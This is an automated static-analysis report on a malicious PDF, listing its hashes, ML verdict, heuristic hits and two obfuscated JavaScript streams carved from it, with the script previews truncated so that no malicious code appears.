Malicious PDF — malware analysis report

Static analysis result for SHA-256 fcd2aa17ddded2ba…

MALICIOUS

PDF

Size: 7.3 KB
First seen: 2021-06-04
MD5: 0706b966bb3482b91c781092c6f2cb94
SHA-1: 74882b928a39b4c827b92560d02e94d260a436cc
SHA-256: fcd2aa17ddded2baf0954b3b799f5a05b15217803353c1d93192901046ce089d
Risk score: 76

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1566.001 Spearphishing Attachment

The sample is a PDF file flagged as malicious by an ML classifier. It contains embedded JavaScript, which is heavily obfuscated and uses hex escape sequences. The JavaScript likely attempts to download and execute a secondary payload, a common technique for malware delivery. While the embedded URLs are benign, the presence of obfuscated JavaScript and the ML classification strongly indicate malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics (5)

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xdp/ Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xci/2.6/ Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-template/2.6/ Referenced by PDF JavaScript

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: javascript_obj0013_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 13 at offset 0x3A4
Size: 5628 bytes
SHA-256: 790a4e2f504a5b003a0660948f7c4fd6f7d4988c71c21421a9d621874f2c0d54
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long hex-escaped blob(s).
Preview script
First 1,000 lines of the extracted script
... (truncated)
Filename: javascript_obj0013_001.js
Kind: pdf-javascript-stream
Source: PDF /JS object 13 at offset 0x3C7
Size: 6472 bytes
SHA-256: 52066f531089888a92fa67f5907b716680814d04e06eeedafa0ae1501bcdb601
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long hex-escaped blob(s).
Preview script
First 1,000 lines of the extracted script
... (truncated)